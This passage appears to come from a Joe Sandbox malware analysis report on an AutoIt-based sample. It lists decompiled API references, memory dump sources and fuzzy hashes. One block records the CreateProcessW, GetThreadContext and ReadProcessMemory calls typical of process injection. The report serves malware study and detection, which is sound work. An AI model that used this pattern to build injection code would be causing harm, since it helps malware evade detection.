                                                              • _memset.LIBCMT ref: 004340FC
                                                              • _wcscpy.LIBCMT ref: 00434150
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00434160
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                              • String ID: Line:
                                                              • API String ID: 3942752672-1585850449
                                                              • Opcode ID: 6d59ee2d36c021d9925bd3668daf1a0fe69d5e2e3579de8d1aaceaa22d0db240
                                                              • Instruction ID: ab07bed2cfd580a7d32a9db5ee3c45df15f6233e176b5cdabeab106ec9a0fae0
                                                              • Opcode Fuzzy Hash: 6d59ee2d36c021d9925bd3668daf1a0fe69d5e2e3579de8d1aaceaa22d0db240
                                                              • Instruction Fuzzy Hash: 6C31D271108705ABD730EB61DC45BEB77E8AF48308F10562FF68592191DB78A658CB8F
                                                              APIs
                                                                • Part of subcall function 00434DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00434E0F
                                                              • _free.LIBCMT ref: 0046E263
                                                              • _free.LIBCMT ref: 0046E2AA
                                                                • Part of subcall function 00436A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00436BAD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                              • API String ID: 2861923089-1757145024
                                                              • Opcode ID: dd2b34f7bb52bbb0938c69f4d4888a19d029a7180bddd6b8df0a44ef34178e10
                                                              • Instruction ID: 5d5c3430a25124b6d38ac48cf0dad262a8c56bbce00fc336ed8dccf5dca2bf26
                                                              • Opcode Fuzzy Hash: dd2b34f7bb52bbb0938c69f4d4888a19d029a7180bddd6b8df0a44ef34178e10
                                                              • Instruction Fuzzy Hash: A091AF75900219AFCF04EFA6CC519EEB7B4FF09314F10446FE815AB2A1EB78A905CB59
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004335A1,SwapMouseButtons,00000004,?), ref: 004335D4
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,004335A1,SwapMouseButtons,00000004,?,?,?,?,00432754), ref: 004335F5
                                                              • RegCloseKey.KERNELBASE(00000000,?,?,004335A1,SwapMouseButtons,00000004,?,?,?,?,00432754), ref: 00433617
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Control Panel\Mouse
                                                              • API String ID: 3677997916-824357125
                                                              • Opcode ID: fe7ed9d5fedd7fb18a4f5b581c9497dc27d2b6ad2464c12a2f9d331eb9c64d98
                                                              • Instruction ID: 2f0305700a78fca4fdce5e354ad81702b186f7a538fd0fc0f1fd1f82a8bc34fe
                                                              • Opcode Fuzzy Hash: fe7ed9d5fedd7fb18a4f5b581c9497dc27d2b6ad2464c12a2f9d331eb9c64d98
                                                              • Instruction Fuzzy Hash: AC114871910208BFDB20DF64DC419AFB7BCEF08741F00556AF809D7210D2759F549768
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01F91A5B
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01F91AF1
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01F91B13
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2137747443.0000000001F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1f90000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                              • Instruction ID: ccc9b15c8e24fe07aedb4f78e2e42f6f5a16b329c06e485ed422a294e748128c
                                                              • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                              • Instruction Fuzzy Hash: D9620C30A14659DBEB24DFA4C850BDEB772EF58300F1091A9D10DEB390E77A9E81CB59
                                                              APIs
                                                                • Part of subcall function 00434EE5: _fseek.LIBCMT ref: 00434EFD
                                                                • Part of subcall function 00499734: _wcscmp.LIBCMT ref: 00499824
                                                                • Part of subcall function 00499734: _wcscmp.LIBCMT ref: 00499837
                                                              • _free.LIBCMT ref: 004996A2
                                                              • _free.LIBCMT ref: 004996A9
                                                              • _free.LIBCMT ref: 00499714
                                                                • Part of subcall function 00452D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00459A24), ref: 00452D69
                                                                • Part of subcall function 00452D55: GetLastError.KERNEL32(00000000,?,00459A24), ref: 00452D7B
                                                              • _free.LIBCMT ref: 0049971C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                              • String ID:
                                                              • API String ID: 1552873950-0
                                                              • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                              • Instruction ID: 44e0b27076a87e2e41ab8428d5fc19437e4c12069863d37d29a993e30942b44b
                                                              • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                              • Instruction Fuzzy Hash: C4514EB1904219AFDF249FA5DC81AAEBB79EF48304F1404AFF609A3241DB755E84CF58
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                              • String ID:
                                                              • API String ID: 2782032738-0
                                                              • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                              • Instruction ID: 7caebcbcc51e0287248e3495dd48301f6accc046c27c5b4d33d4a4611a4a5171
                                                              • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                              • Instruction Fuzzy Hash: 24410834A00745ABCB189E69C8809AF77A5AFC535AB10817FEC158F742E738DDC98B48
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID: AU3!P/L$EA06
                                                              • API String ID: 4104443479-584251071
                                                              • Opcode ID: cf3ad109832178d58d370f6ffb4407bd84747eb00efef499707997fc37a57ba5
                                                              • Instruction ID: 91ed7b442460471391c6bb2f906b01720a36bbb08f61a38ba218a11bb806efe5
                                                              • Opcode Fuzzy Hash: cf3ad109832178d58d370f6ffb4407bd84747eb00efef499707997fc37a57ba5
                                                              • Instruction Fuzzy Hash: 89419D21A0015857DF219B5488527FF7FA1DBCD304F68607BEC829B382D62C7D4587AA
                                                              APIs
                                                              • _memset.LIBCMT ref: 0046EA39
                                                              • GetOpenFileNameW.COMDLG32(?), ref: 0046EA83
                                                                • Part of subcall function 00434750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00434743,?,?,004337AE,?), ref: 00434770
                                                                • Part of subcall function 00450791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004507B0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                              • String ID: X
                                                              • API String ID: 3777226403-3081909835
                                                              • Opcode ID: 4a8490fbf8dc981a7a918020385ac2d8fa1d8b3208ba2b161884b17cb9e03a7e
                                                              • Instruction ID: 6f558b76faf609c988482383c7c155e129a6e3036c3f8c086db08d8a00bf6de9
                                                              • Opcode Fuzzy Hash: 4a8490fbf8dc981a7a918020385ac2d8fa1d8b3208ba2b161884b17cb9e03a7e
                                                              • Instruction Fuzzy Hash: B021D470A102489BCF519FD5C845AEE7BF8AF48319F00805BE548A7241DBB859498F9A
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 004998F8
                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0049990F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Temp$FileNamePath
                                                              • String ID: aut
                                                              • API String ID: 3285503233-3010740371
                                                              • Opcode ID: 2b859bbd0b3f5c4bd256690eb99ff3e7e11587256f029cd5d0d442cbe24fcf2a
                                                              • Instruction ID: ec6e99b086d741b21d9ee23e0ca7d9749064f7eb92b969d41c9f7319d3b38917
                                                              • Opcode Fuzzy Hash: 2b859bbd0b3f5c4bd256690eb99ff3e7e11587256f029cd5d0d442cbe24fcf2a
                                                              • Instruction Fuzzy Hash: ECD05E7954030DABDB50ABA4DC0EF9A773CEB04701F0003F1BF58D11A1EAB2A5988B99
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 71de25266735fe11e0006c9e5fae3cfe4e1a0ba4f05ab67204da25a756fe2162
                                                              • Instruction ID: 195b549ecfd269cbaf140ccc764ba54ab948519c1739a332d3875a6821c54f01
                                                              • Opcode Fuzzy Hash: 71de25266735fe11e0006c9e5fae3cfe4e1a0ba4f05ab67204da25a756fe2162
                                                              • Instruction Fuzzy Hash: 68F149706083009FCB54DF29C480A6ABBE5FF99318F14892EF8999B351D778E945CF86
                                                              APIs
                                                              • _memset.LIBCMT ref: 00434370
                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00434415
                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00434432
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_$_memset
                                                              • String ID:
                                                              • API String ID: 1505330794-0
                                                              • Opcode ID: be3817b1a88e53030942f10b6abc37e5bd335cbaa799560b76b3688f2b2eecab
                                                              • Instruction ID: a4613e3a953525aea8af52eac9c39e0ec186b2bc084807d53af92e9cba843034
                                                              • Opcode Fuzzy Hash: be3817b1a88e53030942f10b6abc37e5bd335cbaa799560b76b3688f2b2eecab
                                                              • Instruction Fuzzy Hash: 353141706047019FD721DF24D88469BBBF8FB98319F000A3FE69A83251D7756958CB5A
                                                              APIs
                                                              • __FF_MSGBANNER.LIBCMT ref: 00455733
                                                                • Part of subcall function 0045A16B: __NMSG_WRITE.LIBCMT ref: 0045A192
                                                                • Part of subcall function 0045A16B: __NMSG_WRITE.LIBCMT ref: 0045A19C
                                                              • __NMSG_WRITE.LIBCMT ref: 0045573A
                                                                • Part of subcall function 0045A1C8: GetModuleFileNameW.KERNEL32(00000000,004F33BA,00000104,?,00000001,00000000), ref: 0045A25A
                                                                • Part of subcall function 0045A1C8: ___crtMessageBoxW.LIBCMT ref: 0045A308
                                                                • Part of subcall function 0045309F: ___crtCorExitProcess.LIBCMT ref: 004530A5
                                                                • Part of subcall function 0045309F: ExitProcess.KERNEL32 ref: 004530AE
                                                                • Part of subcall function 00458B28: __getptd_noexit.LIBCMT ref: 00458B28
                                                              • RtlAllocateHeap.NTDLL(01210000,00000000,00000001,00000000,?,?,?,00450DD3,?), ref: 0045575F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 1372826849-0
                                                              • Opcode ID: f285f299ad252bd8abfc32fd1f54045442fb0e0e06a09544359bed5e1fcd88d3
                                                              • Instruction ID: 0bd25d7cdd4837b1b05041d50cbc1f63c89f52b06989f3a5e8fad221388169ac
                                                              • Opcode Fuzzy Hash: f285f299ad252bd8abfc32fd1f54045442fb0e0e06a09544359bed5e1fcd88d3
                                                              • Instruction Fuzzy Hash: F101D275200B01DBD6102B3AEC62A3E67588B46767F10053FFC05AB283DE7C9C09866D
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00499548,?,?,?,?,?,00000004), ref: 004998BB
                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00499548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004998D1
                                                              • CloseHandle.KERNEL32(00000000,?,00499548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004998D8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: 254bf3d4eccd5ad05499ecee798a4c0d1295b4f4750ccecd318b2a804fad8232
                                                              • Instruction ID: 9eec6b3a1ccf91404cdbc101eb716cfcbf16142178a1bc34d477a915a39ff545
                                                              • Opcode Fuzzy Hash: 254bf3d4eccd5ad05499ecee798a4c0d1295b4f4750ccecd318b2a804fad8232
                                                              • Instruction Fuzzy Hash: A2E08632140214B7DB212B58EC09FCA7F59AB06760F144230FB18790E087B12915979C
                                                              APIs
                                                              • _free.LIBCMT ref: 00498D1B
                                                                • Part of subcall function 00452D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00459A24), ref: 00452D69
                                                                • Part of subcall function 00452D55: GetLastError.KERNEL32(00000000,?,00459A24), ref: 00452D7B
                                                              • _free.LIBCMT ref: 00498D2C
                                                              • _free.LIBCMT ref: 00498D3E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                              • Instruction ID: d8166d4f83b155685f68d3f918d0c108e9bceff05358b8380a4f9cb88d2fe0c0
                                                              • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                              • Instruction Fuzzy Hash: 9FE012A170160246DF24A57DAA40A9317EC4F5A397B140A2FB80DD72C7CEACF84A812C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CALL
                                                              • API String ID: 0-4196123274
                                                              • Opcode ID: 142adf258535de03b1a6e248d445f15f730ebfd1ee5018b75f1ef79241067bd3
                                                              • Instruction ID: 88dc3436ffa515fa134f6d83cfe1594e820bca70c033f4234710fb0a20fd55c1
                                                              • Opcode Fuzzy Hash: 142adf258535de03b1a6e248d445f15f730ebfd1ee5018b75f1ef79241067bd3
                                                              • Instruction Fuzzy Hash: 8B226A70508201DFDB24DF14C490B6AB7E1FF48304F15996EE98A8B362D739EC55CB8A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                              • Instruction ID: e3287db7387147b693b8a58bbe0f8d3770e91dbf1ce5502f406ba9878cefc8dc
                                                              • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                              • Instruction Fuzzy Hash: 2D31E7B1600506AFC714DF68C8D1D69F3A4FF4C314B14822EE959CB391EB34E910CB94
                                                              APIs
                                                              • IsThemeActive.UXTHEME ref: 00434834
                                                                • Part of subcall function 0045336C: __lock.LIBCMT ref: 00453372
                                                                • Part of subcall function 0045336C: DecodePointer.KERNEL32(00000001,?,00434849,00487C74), ref: 0045337E
                                                                • Part of subcall function 0045336C: EncodePointer.KERNEL32(?,?,00434849,00487C74), ref: 00453389
                                                                • Part of subcall function 004348FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00434915
                                                                • Part of subcall function 004348FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0043492A
                                                                • Part of subcall function 00433B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00433B68
                                                                • Part of subcall function 00433B3A: IsDebuggerPresent.KERNEL32 ref: 00433B7A
                                                                • Part of subcall function 00433B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004F52F8,004F52E0,?,?), ref: 00433BEB
                                                                • Part of subcall function 00433B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00433C6F
                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00434874
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                              • String ID:
                                                              • API String ID: 1438897964-0
                                                              • Opcode ID: 605ccfdec59096966fe8a744696a4b7ae21dacb6b9aa299429c5335e923184e5
                                                              • Instruction ID: d60b2d46e873bca2ef5a40cc3c69db13869557659332541a4e7907aed551f901
